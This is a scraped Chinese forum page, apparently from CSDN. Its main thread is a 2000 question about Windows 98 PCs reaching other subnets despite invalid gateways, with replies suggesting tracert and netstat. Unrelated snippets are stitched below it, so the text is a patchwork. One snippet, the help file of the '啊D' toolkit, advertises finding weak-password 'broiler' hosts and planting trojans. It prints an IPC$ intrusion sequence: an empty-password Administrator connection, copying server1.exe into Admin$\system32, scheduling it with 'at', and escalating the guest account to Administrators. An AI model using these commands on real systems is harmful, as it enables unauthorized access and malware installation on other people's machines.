不需要路由也能跨网段访问?请看Windows98的大BUG!!!

fang 2000-02-29 02:38:00
遇到很头疼的问题,我们的网络中大约存在着1000多台PC,划分出20个左右的网段;因
为某种缘故,现在没有打VLAN。所有的PC通过10M网络连接到3COM的Switch 1100上,再
通过3COM CoreBuilder连接到Cisco 7507<GB多摸光纤>。
网络中存在的PC为Windows 98/95,配置时,如果设置的网关不在本网段,而是属
于其他网段的,结果居然能跨网段访问!
可能没有说明白,举个例子:
PC 1 IP:192.168.1.100/255.255.255.0
GateWay: 1.1.1.1/255.255.255.0
<该网段GateWay为192.168.1.1/255.255.255.0,而1.1.1.1根本不存在。>

PC 2 IP:192.168.6.100/255.255.255.0
GateWay:9.9.9.9/255.255.255.0
<该网段没有设置GateWay,而9.9.9.9也根本不存在。〉

Server IP:192.168.100.100/255.255.255.0
GateWay:192.168.100.1/255.255.255.0
<正常设置>

测试结果,1和2之间能Ping通,而且两台机器都可以访问内部的服务器Server<通过网上邻居、Ftp、Telnet、Http都可以>
这个现象,我没有办法解释;而且有个工程师据此认为路由器的Lan口可以只设置一
个地址,而所有的PC都将GateWay指向这一地址即可,我既然无法解释上述现象,自然没有办法让他改变注意。
我初步估计,也认为是Win98/95的问题,现在就想知道,这一现象如何解释。
会不会是98/95的系统中有某种记忆文件,表面上看好似把GateWay改变了,但其实并没
有。我试图抓几个包下来看看,但是没有成功
是我的理解有问题,还是另外有其他的原因?请各位赐教!


...全文
331 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
半宫佳丽 2000-05-03
  • 打赏
  • 举报
回复
如果知道,请通知我!guid@126.com
skyxu 2000-03-06
  • 打赏
  • 举报
回复
可能一,也许你的陆游器启动了rip。
可能二,大概是在同一物理网络,你没有用vlan分割,所以通过广播可以由ip得到
mac地址的,这样就通了!

你有没有感觉到网络很拥挤?
huaiqj 2000-03-01
  • 打赏
  • 举报
回复
我把公司LAN的机器试着改了IP,分别在两个C网,而掩码是255.255.255.0
两边都不能ping通。
你应该用ghostlee讲的traceroute来看看,ICMP包走的路径,才能知道出了
什么问题。
我觉得这不可能是一个BUG
ghostlee 2000-03-01
  • 打赏
  • 举报
回复
用tracert去跟踪你能ping道的ip,
看一看走过的路径,就会知道到底走的是什么网关了.
netmare 2000-02-29
  • 打赏
  • 举报
回复
use "netstat -r" to view ur route-table,and to see if any route-entry existed,or use "winipcfg" to view ur adpter based information.
u can use "tracert 192.168.100.1" to find out ur ip packert how to reach the target subnet.
零成本制造一个虚拟的多 WAN 路由器,多条宽带叠加上网 使用条件: 前提你必须有多个拨号账号,或你的账号允许多拨.其次打开猫的管理界面查看如图 你的端口速率必须接近或大于你要叠加两个账号累积的速率.或者单个账号多拨的速率. www.chinadsl.net% [1 Z: B7 [- d" O 如:Www.ChinAdsl.Net- I/ P6 n3 u: [7A9 宽带生活 - 因你更精彩 - Www.ChinAdsl.Net r( I; R$ f9 V6 r" U( D 有一条电话线.一个猫,一张网卡.2个电信pppoe拨号账号.分别为2m和4m.而我的端口速率下行为5954kbps,大致接近6m.在这种情况下使用才有意义.3G共享|网络尖兵,宽带共享,FW,路由器,ADSL,宽频,宽带,星空极速,router,wlan,wan,无线,宽带共享,firmware,viking,Trendchip,Conexant,BCM,broadcom,固件,网络尖兵,ARP攻击,ARP防御,固件升级,无线路由,端口映射,BT加速,掉线,磊科,NETCORE,TPLINK,DLINK,LINKSYS,DD-WRT,wayos,tomato,中国宽频网,ChinAdsl,ChinaQos,汕尾,海丰,星空极速,沃家庭- v; I. Z$ z- I; U0 V, M9 b' ?$ b: P www.chinadsl.net9 S0 ]0 ]/ H2 m+ o 如果你的账号为2m,且你的端口速率也是2m.就算你多拨,也没意义.因为端口速率已经把你做瓶颈限制了! 原文:http://club.isso.com.cn/Default.aspx?class=Topic&Topic=23118484&Pink=True 作者: saiweng 连续两天的摸索 , 是整两天 , 弄下来头晕脑胀的 , 特别颈椎这里痛啊 . 好在这些总算有点回报 , 在 HDC-NB 群叫嚷了一下成果 , 几个兄弟让我写个教程 , 我斗胆写篇文章让大家分享下我的经验 . 如何制造软路由器 , 首先我们需要虚拟机 , 咋一听 , 这玩意高深啊 , 肯定跟编程有关 , 俺门电脑爱好者用不上,其实不然。虚拟机,就是虚拟电脑,是一台用软件模拟出来,功能完全和你真实电脑一样的软件电脑。当然,它用来调试新程序,测试软件很方便,即使虚拟机死机或被病毒感染,它都与我们所用真实电脑无关,我们只要点下关闭虚拟电脑电源就可以关闭。虚拟机,除了方便还是方便。 虚拟机软件,推荐使用 VMwaire workstation 和 virtualbox ,两者最大区别是前者最多可以添加 10 张虚拟网卡,后者只有 4 张虚拟网卡。再介绍下软路由软件,简单点说,就是我们家里用的路由器的 FIRMWARE (固件),而我们家里的路由器简单点就是一台单片机(比 PC 机简化很多的单一功能的计算机),而我们家里的 PC 机本身就是台通用计算机,当然就可以用软路由软件,可以用在真实电脑上的软件,我们当然也可以用在虚拟机。软路由软件也像路由器刷 FIRMWARE (固件),镜像到一个硬盘上(类似 GHOST to disk )。 软路由软件,推荐使用海蜘蛛(支持国产,庆祝新中国成立 60 周年),当然如果哪位兄弟学习能力比较强推荐大名鼎鼎的 ROUTEROS (简称 ROS ), ROS 涉及到写脚本问题,这个不是一两天能够弄明白,毕竟我只是停留在应用层的一个爱好者。废话少说,举个图例 来说明,在 VMWare 里运行海蜘蛛路由 首先下载 VMWare Workstation ,可以从 官方下载 ,官方下载的是英文版。此外,也可以从 绿色软件联盟 下载绿色汉化版,简单方便。 下面以 VMware Workstation 6.0.3 Build 80004 绿色汉化版 为例,讲述海蜘蛛路由在 VMware 中的安装和运行方法。 1. 安装 VMWare Workstation 下载上述绿色汉化版后解压缩,进入解压缩后的目录,运行 “绿化 .cmd ” 进行安装,提示 “是否要继续” 时,输入 “ Y ” 继续: 安装到最后,会提示启动服务项目,输入 “ 1 ” 继续: 再次提示启动服务项目时,输入 “ 6 ” 退出即可。 2. 建立虚拟机 3. 修改虚拟机参数 最后,虚拟机的参数如右图所示: 下面就可以 “启动虚拟机” 开始海蜘蛛路由系统的安装了, 简单“下一步”敲回车, 1 , 2 秒后 就完毕 回车键( VMware 默认是先从硬盘启动,所以这里直接启动即可,若要重新安装,启动虚拟机按 F2 键,进入虚
完全兼容网上广为流传的飞鸽传书并比原来飞鸽功能更加强大 - 不需要服务器支持 - 支持文件/文件夹的传送 (支持大文件传送[4G以上]), 发送方和接收方都可查看传送进度功能 - 可以建立无需服务器的聊天室,具有群聊天室的功能 - 分组功能 - 组权限功能,可能每组设置不同的权限,例如屏蔽该组成员的信息,对该组成员隐身等 - 给所有在线的用户群发消息及分组群发功能 - 黑名单功能 - 隐身功能,及对某特定组进行隐身功能 - 自定义备注名功能 - 个性头像、个性形象及个性签名功能 - 共享文件功能 - 远程协助功能 - 语音聊天功能 - 自定义表情功能、支持截屏、支持GIF动画 - 随手涂鸭功能,能把您的创意想法得以很好的表达 - 垃圾信息屏蔽功能 - 用户上下线进行通知功能 - 限制传送文件速度功能 - 日程安排与记事功能 - 日程提醒功能;它可以实现年、月、周、日、小时、分、秒的提醒,提醒同时可以执行动作(提示窗口、播放音乐、执行指定程序、关机等)。甚至每年的第几个月提醒、 第几月的星期几提醒等特殊的提醒。 一、如何跟对方聊天? 双击该用户,会出来一聊天对话框,在里面可以跟对方进行聊天。如要发送表情,点击表情按钮,插入表情即可。需要注意的是,如果对方使用的是IPMSG(飞鸽传书),将无法看到您发送的表情符号。在聊天时,可以选择字体按钮设置您所喜欢的字体。您还可以点击输入框右上角的随手涂鸭按钮,绘制出您想要表达的图形,做到图文并茂。 二、聊天时如果给对方发送图片? 总共有四种方法:一是点击随手涂鸭按钮,进行绘图模式,绘制图形发给对方。二是点击发送图形按钮,选择您电脑上的图片发送给对方。三是通过截屏功能,截取您自己的屏幕图像发送给对方。四是点击表情,从表情库中选择图片发送给对方。 三、怎么增加和删除表情? 增加表情有三种方法:一是点击表情按钮,选择增加表情。二是选择表情管理,导入表情库。三是对方自己发送或接收到的图片,可以选择图片点右键,选择增加至表情库中。 删除表情有两种方法:一是通过表情管理中的删除按钮来删除。二是在表情的页面中,点击要删除的表情按右键选择删除。 四、如何传送文件给对方? 在聊天对话框中,在右侧栏中的发送文件里,可以增加您要发送的文件或文件夹。同时也支持拖放功能,这是一种快捷的操作方式,操作方法是选中要发送的文件或文件夹,按住鼠标左键不动,把文件拖放到聊天对话框中,松掉鼠标左键即可。点击发送按钮把文件传送给对方。如果要查看发送的文件进度,可以选择发送文件栏旁边的文件监视按钮进行查看。在文件监视对话框中即可以查看文件发送状态,也可以取消用户还没有接收的文件。 五、如何接收对方传送来的文件? 当对方传送的文件到来时,会在聊天对话框右侧栏中的接收文件栏中显示。如果您要全部接收,点击全部接收即可。如果您只接收其中的部分文件,可以选中要接收的文件,点击接收按钮或双击要接收的文件即可。如果全部不接收点击全部拒收按钮。如果不接收其中的部分文件,选中不接收的文件,点击取消按钮。当文件在传送中时,如果要取消或中断传送,点击中断传送按钮。当文件接收完时,会从接收文件列表中移除去,在已接收文件栏中增加已传送的文件,用户可以选中已传送的文件,点击右键,进行打开目录,打开文件,删除,永久删除等一系列操作。如果文件在传送过程中,您点击了关闭按钮,文件将在后台进行接收,不影响文件的传送。 六、如何显示或不显示我的输入状态? 在聊天对话框的输入框中点击右键,设置我的输入状态。 七、如何设置对方打开消息后给我进行通知(需要回执) 点击聊天对话框的发送按钮旁边的小箭头里设置。 八、如何设置对方消息到来时只进行通知不直接弹出对话框? 点击主界面的设置按钮,在发送、接收设置栏中进行设置。 九、如何保存和查看聊天记录? 如果您还没有设置保存聊天记录的话,点击主界面上的设置按钮,在出现一设置对话框, 选中其它设置栏中“保存聊天记录和日志”选项。然后设置下聊天记录要保存的文件位置。聊天窗口中的聊天记录按钮可以查看您跟该用户的聊天记录,全部聊天按钮可以查看全部用户的聊天内容。 十、如何设置我的用户名、组名、头像、个人形象照片及个性签名? 点击主界面上的设置按钮,在设置对话框里进行设置,其中头像指的是在用户列表中显示的头像,个人形象照片是和对方聊天时,您在对方聊天对话框中右上角部分显示的形象照片。 十一、如何共享文件或文件(夹)? 点击主界面上的设置按钮,在设置对话框里中系统设置栏里点击文件共享设置。在里面设置共享文件或文件(夹),如果您要设置密码保护,修改密码(默认情况密码为空),这样其他用户下载时
::: 啊D网络工具包 帮助文件 ::: 软件功能如下: --------------------------------------------------------------------------------- 1. 共享资源查找 [为你查找网上的共享资源!] 2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便] 3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!] 4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便] 5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!] 6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!] 3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!] 3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626] 4. 端口扫描 [使你更加了解对方主机端口的打开状况] 5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址] 6. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!] 7. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!] 8. Ping [判断某IP是否和网络连接的好帮手!] 9. 域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!] 10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!] 11. Finger [Finger能为你查询对方系统的用户信息!] 12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!] 13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!] 14. 常用修改 [反恶意网页修改,恢复系统设置等] 19. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!] --------------------------------------------------------------------------------- 支持的系统:win98/WinMe/win2000/WinXP/WinNT 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 =================================== 关于 =================================== 制作人: 啊D QQ号码: 9269563 邮 箱: paf@163.net 网 址: http://d99.126.com 地 址: 深圳市龙岗区坪山镇石井太阳村 如果觉得本软件不错,发一份电子信件, 表示对作者的支持! 在使用中发现错误,记下你的测试环境,告诉我!以便更好地解决问题,先谢! 注: 本软件为免费软件,对使用本软件产生的后果,由使用者承担! 本软件可随意转载,转载时确保文件的完整!未经同意,勿用于商业用途! ================================================================== 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 ------------------------------------------------------------------ ================================================================= 更新 ================================================================= DTools 2.01 更新情况(2004.4.3) * 更新了过期问题。 * 加入公告板。 DTools 2.0 更新情况(2003.8.15) * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",想知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"! * 在主机框里输入IP将会在全部的IP框中加入刚输入的地址!在IP框中输入IP也会把IP加入主机框中!减少了复制、粘贴的工作量! DTools 1.01 更新情况(2003.4.20) * 增加了网卡MAC地址查看功能! * 增加了肉鸡(IPC$)查找功能! * 增加了木马(IPC$)种植! * 增加了读取NT用户列表功能! * 增加了Finger功能! * 增强了共享资源查找器的功能,在win2000下能查找 C$ D$ .. IPC$ ADMIN$ 等隐藏共享目录 * 修改了共享查找的介面 * 删除了密码查看功能 * 修正了在Win2000下不能运行的问题 * 修正了一些Bug * 介面作了少量改动! * 添加了"在桌面加入快捷方式"的功能! * 外置了端口说明!

4,356

社区成员

发帖
与我相关
我的任务
社区描述
通信技术相关讨论
社区管理员
  • 网络通信
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧